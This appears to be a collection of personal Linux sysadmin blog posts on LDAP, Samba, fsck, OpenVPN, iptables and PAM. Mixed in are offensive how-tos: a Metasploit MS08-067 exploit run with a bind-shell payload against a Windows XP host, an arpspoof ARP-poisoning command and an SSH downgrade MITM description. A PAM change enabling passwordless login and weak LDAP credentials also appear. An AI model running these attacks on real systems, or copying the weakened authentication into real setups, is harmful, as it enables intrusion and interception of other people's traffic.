Today i decided to migrate my openldap configuration from traditional slapd.conf file to new slapd-config structure.In new slapd-config structure it is possible to apply changes in running ldap server, i mean there is no need to restart ldap server for configuration changes. As traditional slapd.conf have following format


# global configuration directives



# backend definition

backend



# first database definition & config directives

database



# second database definition & config directives

database



New slapd-config structure create .ldif files that store configuration in ldap format.

My existing slapd.conf have following domain definition

----------------------------

access to * by none

Include ...

pidfile ...

argsfile ...

database bdb

suffix dc=vk,dc=com

rootdn cn=Manager,dc=vk,dc=com

rootpw secret

database config

rootpw config

index objectClass eq

-------------------------------

Note: config database added for migration purpose.

I migrated this configuration into new slapd.d (slapd-config). For this i taken following steps

Created slapd.d folder

root#mkdir /usr/local/etc/openldap/slapd.d

Apply slaptest command

root# slaptest -f /usr/local/etc/openldap/slapd.conf -F /usr/local/etc/openldap/slapd.d

After successful execution of command i noticed that one file and one folder created inside directory /usr/local/etc/openldap/slapd.d

folder name : cn=config and filename: cn=config.ldif

Inside cn=config folder a number of other files created.

Using syslog

We can configure our syslog configuration file for organized logging. system logger collects messages from programs and even from the kernel. These messages are tagged with a facility that identifies the broad category of the source, e.g., mail, kern (for kernel messages), or authpriv (for security and authorization messages). In addition, a priority specifies the importance (or severity) of each message. The lowest priorities are (in ascending order) debug, info, and notice; the highest priority is emerg, which is used when your disk drive is on fire. The complete set of facilities and priorities are described in syslog.conf(5) and syslog(3).


Messages can be directed to different log files, based on their facility and priority; this is controlled by the configuration file /etc/syslog.conf. The system logger conveniently records a timestamp and the machine name for each message.

Priority names in the configuration file normally mean the specified priority and all higher priorities. Therefore, info means all priorities except debug. To specify only a single priority (but not all higher priorities), add "=" before the priority name. The special priority none excludes facilities, as we show for /var/log/messages and /var/log/debug. The "*" character is used as a wildcard to select all facilities or priorities. See the syslog.conf(5) manpage for more details about this syntax.

local[0-7] facilities, reserved for arbitrary local uses, are sent to separate files. This provides a convenient mechanism for categorizing your own logging messages.

Logging remotely

Configure /etc/syslog.conf for remote logging, using the "@" syntax:

/etc/syslog.conf:

# Send all messages to remote system "loghost"

*.* @loghostOn loghost, tell syslogd to accept messages from the network by adding the -r option:

# syslogd -r ...

Disable console program access

The /etc/security/console.apps/ directory should contain one file per


application that wishes to allow access to console users. The filename

should be the same as the servicename. To disable console equivalent

access to programs like shutdown, reboot, and halt for regular users

on server.

[root@vishesh] /# rm -f /etc/security/console.apps/halt

[root@vishesh] /# rm -f /etc/security/console.apps/poweroff

[root@vishesh] /# rm -f /etc/security/console.apps/reboot

[root@vishesh] /# rm -f /etc/security/console.apps/shutdown

samba+ldap setup

After working around 2 years on samba+ldap setup, i can say it is stable and most useful , where we need linux based authentication server to authenticate windows users. Users, computers and group account get stored in ldap(openldap) format in samba+ldap setup, same as in windows Active Directory . My ideal setup that is functioning properly from last 2 years without any issues is as follows .


My smb.conf files content is as follows
--------------------------------------------
[global]

workgroup = test server string = test1 netbios name = test1

ldap passwd sync = yes security = user passdb backend = ldapsam:ldap://127.0.0.1 ldap suffix = dc=test,dc=com

ldap machine suffix = ou=Computers ldap user suffix = ou=People ldap group suffix = ou=Group ldap admin dn= "uid=root,ou=People,dc=test,dc=com"

domain master = yes domain logons = yes

logon path = add user script = /usr/sbin/smbldap-useradd "%u" add group script = /usr/sbin/smbldap-groupadd "%g" add machine script = /usr/sbin/smbldap-useradd -w "%u" delete user script = /usr/sbin/smbldap-userdel "%u" delete group script = /usr/sbin/smbldap-groupdel "%g"

local master = yes os level = 254 preferred master = yes wins support = yes [netlogon] comment = Network Logon Service path = /var/lib/samba/netlogon guest ok = yes writable = no share modes = no

------------------------------------------------------

My ldap server configuration is as follows

(content of slapd.conf file)

------------------------------------------------------

include /etc/openldap/schema/core.schema

include /etc/openldap/schema/cosine.schema

include /etc/openldap/schema/samba.schema

include /etc/openldap/schema/inetorgperson.schema

allow bind_v2

pidfile /var/run/openldap/slapd.pid

argsfile /var/run/openldap/slapd.args

access to *

by self write

by users read

by anonymous read

database bdb

suffix "dc=test,dc=com"

rootdn="cn=Manager,dc=test,dc=com"

rootpw {SSHA}oifg.ytugjhkk

directory /var/lib/ldap/test.com

index uidNumber,gidNumber

------------------------------------------------------

Note: Ensure that samba.schema file

present is /etc/openldap/schema directory.

If not present, search samba.schema file on system

and copy that file in /etc/openldap/schema

Download & install smbldap tool from following link.

http://tinyurl.com/344ypzg

Apache server-status

Today i decided to monitor my apache web server by server-status. For detail analysis i turned 'ExtendedStatus' flag on. And uncomment following lines




SetHandler server-status

Order deny,allow

Allow from all

Deny from none



After that i restarted apache. Accessing http://localhost/server-status show server status in detail. But Request Section attracted my attention. In request section other that GET method PROFOUND and OPTIONS are also mentioned. After investigation i conclude that PROFOUND in related with WebDAV and OPTIONS method represents a request for information about the communication options available on the request/response chain identified by the Request-URI.

While doing investigation through google i also noticed some concern that apache server-status shows thousand of ::1 OPTIONS * HTTP/1.0. But the some important thing i noticed that even though none of client accessing Apache serve, in server-status a number of PROFOUND and OPTIONS request are showing from random client.

super block recovery and fsck stages

As we know fsck is a great command to check and repair error on file system. Many times i found filesystem in panic and fsck make it operation-able. I used fsck many times but every time i ensured that filesystem on which i applying fsck be in unmount state.


But the most important thing i was interested is fsck stages. Whenever i issued fsck command it output as

Phase 1: Checking Inodes,blocks and sizes

Phase 2: Checking directory structure

Phase 3: Checking directory connectivity

Phase 4: Checking Reference count

Phase 5: Checking group summary information

fsck checks the integrity of several different features of the file system. Most important checking that fsck do is of super block. As we know super block is most important aspect of file system which stores summary information for the volume. super block is also most modified item in file system so chances of corruption of super block is always high.

Checks on the superblock include:

A check of the file system size, which obviously must be greater than the size computed from the number of blocks identified in the superblock

The total number of inodes, which must be less than the maximum number of inodes

A tally of reported free blocks and inodes

On number of occasion I found super block of my file system get corruption. Although its a very difficult for me to dictates reasons of super block corruption. But the better part is that a backup super block is always present in our file system. To know that where is alternate super block we can use dumpe2fs command as follwing root# dumpe2fs /dev/sda1
more Generally block number 32768 is backup super block, so to recover filesystem using backup super block fsck command can be used in following ways root# fsck -b 32768 /dev/sda1 Other than super block corruption other error can be easily fixed by using fsck in straight ways as following root# fsck -y /dev/sda1 (Here -y option save us from pressing y while asking for yes during recovery ) When inodes are examined by fsck, the process is sequential in nature and aims to identify inconsistencies in format and type, link count, duplicate blocks, bad block numbers, and inode size. Inodes should always be in one of three states: allocated (being used by a file), unallocated (not being used by a file), and partially allocated, meaning that during an allocation or unallocation procedure, data has been left behind that should have been deleted or completed. Alternatively, partial allocation could result from a physical hardware failure. In both of these cases, fsck will attempt to clear the inode. The link count is the number of directory entries that are linked to a particular inode. fsck always checks that the number of directory entries listed is correct, by examining the entire directory structure beginning with the root directory, and tallying the number of links for every inode. Clearly, the stored link count and the actual link count should agree, but the stored link count can occasionally be different than the actual link count. This could result from a disk not being synchronized before a shutdown, for example, and while changes to the file system have been saved, the link count has not been correctly updated. If the stored count is not zero, but the actual count is zero, then disconnected files are placed in the lost+found directory found in the top level of the file system concerned. In other cases, the actual count replaces the stored count

for finding alternate/backup superblocks the following command can also be used,

#mke2fs -n /dev/device
use -j switch also if it is an ext3 file system (mke2fs -n -j /dev/device)

Files with no inode, no owner and no group.

Yesterday i encountered a file system error on my server. Some of files in one of partition formatted with ext3 was showing ? in place of inode, owner and group position.


root# cd /data/Trash

root# ls -li

? ? ? ? ? abc.txt

I become confused. find command also report a number of files which has no owner

root# find /data/Trash -nouser

Investing through problem result in conclusion that there is file system error in that partition. I advised apply fsck command immediately. Applying fsck solved the problem but i am searching in what condition file exist without inode number.

root# fsck -y /dev/vg1/lv1

I also ensured that that file system get applied fsck on reboot

root# shutdown -Fr now

One interesting point i learned in between is that maximum 16 consequent times a file system can get mounted without applying fsck after that a warning come to fsck although this setting can be override with tune2fs command.

The best option to reduce file system error is to apply fsck at booting time. This can be easily done by making entry in /etc/fstab for example in my case the entry is

/dev/vg1/lv1 /data ext3 defaults 1 2

Here 1 says apply fsck and 2 says after applying fsck on root.

Linux Kernel Architecture

Linux kernel is composed of five main sub system.


The Process Scheduler (SCHED)

The Memory Manager (MM)

Virtual File System (VFS)

Network Interface (NET)

Inter-Process Communication (IPC).

Linux kernel provide virtual interface to user process. Each subsystem of kernel have a set of data structure and corresponding program to work on that data structure. To understand the linux kernel internals we need to elaborate each of the subsystem. The data structure of each of subsystem need to be understand first.

Memory usage by linux process

Following command can tell memory usage by individual process in linux.


root# ps aux

USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND

root 1 0.0 0.0 2020 636 ? Ss Jan 21 0.02 init[5]

In the above given output VSZ stands for Virtual Set Size and RSS stands for Resident Set Size. These two VSZ and RSS tell how much memory process are taking up.

But output by ps is not really correct. The reason is very simple, as we know running process use many loaded shared libraries. ps command also include space used by those libraries, but the fact is that same libraries can be used by many processes. To know memory map of loaded shared libaries used by a particular process we can use pmap command.

root# pmap 2939

(Here 2939 is process id)

VPN connectivity using OpenVPN

setup OpenVPN server on RHEL 5.1 and client on windows xp.


I installed OpenVPN rpm on my linux system by downloadingopenvpn-2.0 from download.fedora.redhat.com/pub/epel.

During installation i got error of dependency on lzo2 package i also installed lzo2 and continued with openvpn installation. After installation of openvpn rpm i created server.conf in /etc/openvpn directory with following statement

root# vi /etc/openvpn/server.conf

local 192.168.11.83 port 8888 dev tap0 secret key.txt persist-key persist-tun ping-timer-rem ping-restart 60 ping 10 comp-lzo user nobody verb 3

--
As i used tap0 device for vpn interface. I added this tunnel device using following command

openvpn --mktun --dev tap0 After creating tunnel device i added added my interface and tunnel device into a bridge using following command

 brctl addbr br0
 brctl addif br0 eth1
brctl addif br0 tap0

Now i assigned ip to these interfaces

 ifconfig eth0 0.0.0.0 promisc up
 ifconfig tap0 0.0.0.0 promisc up

I assigned ip by DHCP so

dhclient br0

Now my ethernet bridging for OpenVPN setup is ok and last thing i needed to do to copy key.txt that i geneted on windows client into

 /etc/openvpn folder.

Finally i started by OpenVPN Server

 root# service openvpn start

I downloaded openvpn for windows and installed that on my windows xp machine.-Now client need to be configured on windows xp. For that i open c:\program files\openvpn\config folder and created a test.opvn file with following entries

remote 192.168.11.83
port 8888
dev tap
secret key.txt
ping 10
ifconfig-nowarn
comp-lzo
verb 3

I ensured that key.txt file exist in

c:\program files\openvpn\config folder.

Now i connected my windows openvpn client to openvpn server running on linux system Note: I followed the instruction from url http://openvpn.net/index.php/open-source/documentation/install.html?start=1

vmware advantage over others

Now a days three virtualization technology are popular in market. Citrix's Xen, Microsoft Hyper V and Vmware. Vmware is certainly a market leader. After reading some of discussions and articles i concluded that ther are some striking feature in vmware that is not availabe in its counterparts. Some of them are


Storage motion

DRS

Memory overcommit

vmware Vshere

Although vmware price is one of the issue but it is first choice in enterprise level virtulization. In Desktop virtualization it has lot to do.

How large is the virtual address space for a process in Red Hat Enterprise Linux?

Many times query arise that how much RAM is supported by Redhat Enterprise Linux 5. Redhat knowledge base says follwing on this matter.

This depends on the capabilities of the CPU, the kernel running on the CPU, and how the application was compiled. CPUs such as the Intel Pentium 4 and the AMD Athlon are 32-bit processors, will use 32-bit kernels, and will run applications that are compiled and linked for a 32-bit environment. In contrast, most later processor models are capable of running 64-bit code This is often indicated as "AMD64", "EM64T", "x86-64" or even "x64". They can boot either 32-bit or 64-bit kernels, and, when using a 64-bit kernel, can execute both 32-bit and 64-bit applications.

In each of these cases, the virtual address space available to the executing application is different, as shown in the table below:

CPU             Kernel              Application     Virtual Address Size


32 or 64 bit  32 bit (smp *)      32 bit          slightly under 3GB

32 or 64 bit 32 bit (hugemem **) 32 bit      slightly over 3.7GB

64 bit          64 bit                      32 bit        4GB

64 bit          64 bit                      64 bit         more than 256GB


GNOME vs KDE

Recently i followed some discussion by professional on GNOME vs KDE as desktop.


My conclusion is that currenly GNOME has edge over KDE. GNOME is

considered to be more stable, reliable and easier to handle than KDE.

Many people think that XFCE is faster than these two GNOME and KDE but

some feel that benmarking test unable to proof that XFCE is faster.

Some believe that KDE 3.5 was fine but KDE 4.x is not as good. Many of

professional prefer FlushBox.

But final answer is 'What you like and what you use i mean taste of user'

Fastest Linux distribution

It depends on many factors such as kernel , file system etc. Linux kernel can be tuned for various parameter.We can tune and prioritize both process and I/O scheduling, processor, memory and I/O affinity,paging, shared and other memory-VM, etc. I mean it depend on your tuning as well as how much application and daemons are running. But question still remain relevant because with same sort of application and daemon and tuning same kernel parameter which distribution run fastest.


As performance is concern many expert believe that BSD(http://www.freebsd.org/), Arch(http://www.archlinux.org/) and Gentoo (http://www.gentoo.org/) perform better than others. Some techie also prefer compiling own linux from linux from scratch(http://www.linuxfromscratch.org/). Although i never used any of these preferred distro but my experience say for better performance slackware (http://www.slackware.com/) can also be one of choice.One important point to remind that there is nothing as fastest linux distribution its all depends on your taste, and how much you tune and customize linux for you. For latest trends in popularity you can visit distrowatch.com

First experience of windows xp hacking

From last few days i have been working with snort (Intrusion Detection System ) to make network more secure. To test snort setup i used Metasploit tool. Between this i decided to test my skill on metasploit by hacking a windows xp system Since i am using Backtrack live cd i found metasploit in directory /pentest/exploits/framework3, there i found program msfconsole


root# cd /pentest/exploits/framework3

root#./msfconsole

Now i am inside metasploit

msf>

I used following command to hack a windows xp system (sp2) with ip 192.168.1.5 from my system (192.168.1.3) , inside metasploit

msf> use windows/smb/ms08_067_netapi

msf> show options

msf> set RHOST 192.168.1.5

msf>set LHOST 192.168.1.3

msf>set PAYLOAD generic/shell_bind_tcp

msf>exploit

After that exploit start with gave me message that a seesion created. Cheers i hacked a windows, it was so easy. One thing is also important here that for movement between sessions we can use

msf> sessions -i 1

Hacking is really fun but its really not good that windows systems are so vulnerable.
Enjoy Hacking !
Helpful links are http://www.metasploit.com/, http://www.backtrack-linux.org/

console vs terminal

The main difference between console and terminal in linux is that console uses the whole screen to enter line-oriented commands in text mode while terminal emulate a console within a window normally created by x window environment. In linux there are six consoles available, each one is accessible with the shortcut keys Ctrl-Alt-F1 to Ctrl-Alt-F6.


I can say console is shell without running X. For terminal will be available within running X. More or less both are same in functionality but have some behavioral differences, like terminal is flexible and we can have more than 6 terminal open at same time but require x windows. Using console mean no mouse , no graphics just type command and get output.

How to use xargs?

xrgs command is used where we need to pipe stdout to stdin in the manner that each argument pass one at a time instead of a batch. For example suppose you need to delete all avi files(files that have avi extension) from /root folder, then you can use xargs in following way


root# find /root -name *.avi -type f -print
xrgs rm -f

But sometimes you may face error if you a very long list of avi files in /root. In this case just modify your command in following ways

root# find /root -name *.avi -type f -print0
xrgs -0 rm -f

For achieving above given task you can also use -exec with find in following ways

root# find /root -name *.avi -type f -exec rm -rf {} \;

Or if you want to little bit more scripty , try following

move into /root first

root# cd /root

then

root# for a in *;do rm -f $a;done

Packet crafting using scapy

I was always in search of a tool that allow me create own network packet by giving values in protocol fields. My search ends with scapy. scapy is great tool to craft tcp/ip packets and send it over network. This is how i used scapy to test my firewall rule,


I sent a packet which has TCP flags syn set for port number 80 on destination 192.168.1.3

(Note: The lines in {} is comment)

root#scapy

>>>ans,uans=sr(IP(dst="192.168.1.3")/TCP(sport=1100,dport=80,flags="S")) {sr stand for send/receive}

Finished to send 1 packet ....

>>>for snd,rcv in ans: {don't forget to mention : at end}

... {put space here} print snd.seq,rcv.seq

... {press enter key}

0 12987

So, i got the sequence number of sent packet as well of received packet.

Setup mobile broadband on linux

I am using sony ericsson k790i with Aircel(India) connection. To setup mobile broadband on my linux (BackTrack 4) laptop, i done following steps.


Step1. I plugged my mobile to my laptop (using usb data cable).

Step2. I issued command wvdialconf which detected usb modem of my mobile and created conf file /etc/wvdial.conf

root# wvdialconf

root# more /etc/wvdial.conf

Step3. I edited /etc/wvdial.conf and ensure following entries in file. You may found most of entries already present in file.

root# vi /etc/wvdial.conf

[Dialer Defaults]

Init1 = ATZ

Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0

Init3= AT+CGCDONT=1,"IP","aircelgprs","",0,0

Modem Type= USB Modem

Phone = *99#

ISDN = 0

Stupid Mode=1

Password = blank

New PPPD = yes

Username = blank

Modem = /dev/ttyACM0

FlowControl=NOFLOW

Baud = 460800

(Remember that aircelgprs is my APN and username and password is blank)

Step4. Now issue command wvdial and after few messages my laptop get connected to internet.

How to stop syn flood attack using iptables ?

This is what i done to stop syn attack on my linux system.


iptables -N syn-flood

iptables -A INPUT -p tcp --syn -j syn-flood

iptables -A syn-flood -p tcp --syn -m hashlimit \

--hashlimit 200/sec --hashlimit-burst 3 --hashlimit-htable-expire

300000 --hashlimit-mode srcip --hashlimit-name testlimit -j RETURN

iptables -A syn-flood -m recent --name blacklist --set -j DROP

iptables -A INPUT -j syn-flood

Now let me explain the rules i added in iptables. First of alli

created a chain named syn-flood.

iptables -N syn-flood

Then i forwarded all tcp syn packet to that chain

iptables -A INPUT -p tcp --syn -j syn-flood

After that i used hashlimit match which is a extension of limit match.

In this match i created hash table of syn request ,ip address wise. If

syn request exceed 200 request per second then Return the packet.

--hashlimit-htable-expire determine how much time idle hashtable entry

expire. --hashlimit-name specify specific name of this hashtable it

can be viewed inside /proc/net/ipt_hashlimit directory.

ptables -A syn-flood -p tcp --syn -m hashlimit \

--hashlimit 200/sec --hashlimit-burst 3 --hashlimit-htable-expire

300000 --hashlimit-mode srcip \ --hashlimit-name testlimit -j RETURN

To put the ip doing syn flooding in black list i used 'recent' match

as following. In given rule packet matched based on recent event that

is hashtable rule and create a new list (--name) named blacklist and

make new entries(--set) in it and then DROP packet.

iptables -A syn-flood -m recent --name blacklist --set -j DROP

Suggest me if you have any better idea.

Turn off window machine from remote linux machine

Using samba you can turn off windows machine from remote linux machine.Use net rpc command in following way


net rpc SHUTDOWN -I -U < windows username>

For example to shutdown windows machine with ip 192.168.5.5 with username administrator , use following

root# net rpc SHUTDOWN -I 192.168.5.5 -U administrator
 
you can also create user remotely via linux pc


by entering command

#net rpc user ADD -I (ip of window pc) (user name) (password) -U administrator

Save session and resume it in another terminal

Suppose you are working on your office server and want to save the session and resume it from another location like suppose from your home. screen command is used for this purpose. Let us take an easy example to understand it. Suppose you are on console 2 (alt+ctrl+f2) and issue following commands


root# screen -S test

root#echo hello

Now move to console 3 (alt+ctrl+f3) and type following command

root# screen -d -R test (here -R is to restore the session)

Check the output , i hope you got the magic of screen command. To exit from session use exit command.

Lock account in linux

To lock a user account in linux following command can be used


root#passwd -l

For example

root#passwd -l user1

Comand will lock user1, i mean user1 cant login on system now.

To get status of locking status , we can use passwd command in following way

root# passwd -S

For example

root# passwd -S user1

If it shows LK that means account is locked

And if account has to be unlocked , use passwd in following ways

root#passwd -u

For example

To unlock account user1

root#passwd -u user1

But what if you want to lock account after a given number of failed login attempt. Suppose you want to lock account after 3 unsuccessfull login attempt. pam_tally pam module is used for this purpose , i am going to discuss implementation of this module in my next article.

You can try following commands to list all locked users


passwd -S -a  grep LK | cut -d " " -f1
or
passwd -S -a | awk '/LK/{print $1}'

Lock account in linux using pam_tally or pam_tally2

pam_tally pam module can be used to lock a account after centain number of failed login attempt. For example if you want to lock user after 3 failed login attempt. Then configure you /etc/pam.d/system-auth file in following ways


auth required pam_tally.so onerr=fail deny=3

(Remember to put this line above the line auth required pam_unix.so)

account required pam_tally.so reset

Now save the system-auth file and try it with some user. This worked for my RHEL 5.4 system.

But suppose you have some extended requirement to lock user for few seconds or minutes after invalid login attempts. You can try pam_tally2 pam module. Like in following statement unlock_time is 5 minute after get locked for 3 unsuccessful login attempt. Edit for /etc/pam.d/system-auth file in following ways

auth required pam_tally2.so deny=3 unlock_time=300

To get information about when last invalid login attempted you can use following command

root#pam_tally2 -u

To manually Unlock the account use following command

root#pam_tally2 -r -u

To get help try command man pam_tally 2 .

How to block pen drive in linux?

The easiest way to disable usb storage device in linux is create following file


/etc/modprobe.d/no-usb

And add following line inside the file

install usb-storage /bin/true

Cheers usb-storage device blocked for your linux system now. I done this on my RHEL 5.4 system.

Lock console in linux

Suppose you are working in text mode may be in console or ,remotely using telnet or ssh and you want to lock your screen of working. vlock command is used for this purpose. For example


root# vlock

This tty is now locked.

Please enter the password to unlock.

Supplying password will unlock the screen.

If you are graphical screen xlock and xscreensaver command will do same. I installed vlock through yum repository on my rhel 5.4 system,
root#yum install vlock
But xlock (now xlockmore) is not present in repository so try following link http://rpm.pbone.net/index.php3/stat/4/idpl/2122967/com/xlockmore-5.18-2.1.el5.rf.i386.rpm.html .

TCP Wrapper Determine TCP Wrapper Support

TCP Wrapper is a host-based Networking ACL system, used to filter network access to our linux system. Remember libwrap is the actual library that implement TCP Wrapper. But How we will determine which daemons support TCP Wrapper, i mean which server application are compiled with libwrap? . Use the following command

root# egrep libwrap /usr/bin/* /usr/sbin/*
/usr/sbin/vsftpd
/usr/sbin/sshd
.....
While configuring TCP Wrapper you can use base name , i mean in my example vsftpd and sshd to set access right. For example you can set following in /etc/host.deny

sshd : ALL

To deny ssh access to all computers.

SSH Session Hacking

SSH session can be hacked using MiTM(Man in The Middle) attack. This attack is known as ssh downgrade attack. Let us understand it. Suppose you are accessing machine C from machine A using ssh


A-------------------------------->C

Now suppose there is a machine B which come in middle and alter request that coming from A and forward it to C and vice versa.

A------(ssh request)--->B----------------->C

Now A send ssh request to C. C replies that it support Version1 and Version 2 of SSH protocol.

A--------------->-----------------C

A-----<-----(C only support V1) B-----<------C(support v1 and v2 of ssh)

But B alter packet and pass to A that C only support versio1 of SSH.

A-------->(ssh1)-----------B(sniff packet)------>------C

Since version1 of ssh is insecure by sniffing packets you can get login and password details passed in ssh. This attack is know as ssh downgrade attack, a MiTM implementation. You can try this using ettercap(http://ettercap.sourceforge.net/).

Set blank root password in linux

As like windows O.S. how to set blank password for a user ?


We have a command

# passwd -d (User name)

It will set blank Password for user but what about without password login?

ie There is no need of password prompt by linux

ya i am talking about MY fev. topic "PAM"

For that we have to change in "/etc/pam.d/login" file
.....................................................

auth optional system-auth

instead of :->

auth include system-auth
...........................................................

But on that condition users can login without password prompt in text mode only.

Linux PAM , Lock account in Linux using pam_listfile.so

Dear friend as an admin every day my boss gives a list of different users for login denied


so i use :->

root#passwd -l user1

for that users for locking &

root#passwd -u user1

for unlocking them

but i have 100 users lists every day

so it makes me busy for 1 hr every day

suddenly i remember about file /etc/vsftpd/ftpuser

then for the help of pam.d i applied it to login attempt

I just write in top of the file

root# vi /etc/pam.d/login

auth required pam_listfile.so item=user sens=deny file=/etc/logindeny onerr=succeed

:wq!

& then i create a file & write the name of user which would be denied for that day

root# vi /etc/logindeny

user1

user2

user3

user4

:wq!
& now every day i have to edit only that file & my users are denied for the day

It saves my time daily.

ARP Poising

When i discuss about hacking tips and talk about getting network traffic of other host on your host many ,many people get confused. Believe me its very simple, suppose your host in the network in which victim host is present. You can pollute ARP cache of victim host to forward traffic designated for other host get forwarded to your host.


To understand the complete process, let us understand which happen when one host try to access other host in same network, when source host need mac address of destination host. ARP protocol come in place to get mac address of host by broadcasting IP address. I mean suppose host A(192.168.5.1) need to access host B(192.168.5.2), ARP on host A broadcast message 'who has ip 192.168.5.2 tell me your mac' , in normal circumstances B will reply with its MAC address , but in case of ARP poising another attacker host suppose C , reply with its mac address pretending that ip belong to it. So the data that should go to B will go to C. And suppose ip forwarding is enabled on C , A will not notice any hacking but C is here Man in Middle.

I use arpspoof command to do this basic hacking

root# arpspoof -t 192.168.1.1 192.168.1.2

In above statement victim is 192.168.1.1(i example its host A), and 192.168.1.2 is what attacker pretend to be (In given example its host B) and this command will run on attacker machine(I given example host C)

Linux kernel security

Where security is top priority , we first focus on security of Linux kernel. Although by default linux kernel are not very secure , there are important linux kernel patches to secure your linux box. These kernel patches are SELinux , AppArmor and Grsecurity. These patches control access between processes to objects, processes to processes and objects to objects.


SELinux by default included with Redhat's CentOS/RHEL/Fedora , Debian /Ubuntu , Suse , Slackware and many other distribution. Implementation of SeLinux require high skill sets.

AppArmor released and maintained by Novell under GPL license. Its an alternative of SeLinux and very effective in securing applications. AppArmor is default in OpenSuse and Suse Enterprise Linux. Implementation of AppArmor also require medium level skill sets.

Grsecurity is a set of patches for linux kernel with the focus of enhancing security. Its implement RBAC(Role Based Access Control). Its available for any linux distribution. Its easy to implement.